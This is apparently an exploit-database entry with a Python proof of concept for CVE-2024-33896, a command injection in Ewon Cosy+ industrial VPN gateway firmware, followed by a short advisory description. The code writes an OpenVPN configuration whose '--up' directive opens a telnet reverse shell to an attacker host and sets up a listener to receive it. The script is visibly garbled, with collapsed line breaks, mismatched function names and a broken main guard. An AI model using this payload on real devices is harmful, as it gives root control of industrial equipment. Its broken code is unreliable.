# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
 # Tested on: Windows 11 Home Edition
 # CVE: CVE-2024-33896


import socket
import subprocess
import time

def configcreator(file_path):
 with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")


GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC

Hey,

Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.

Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.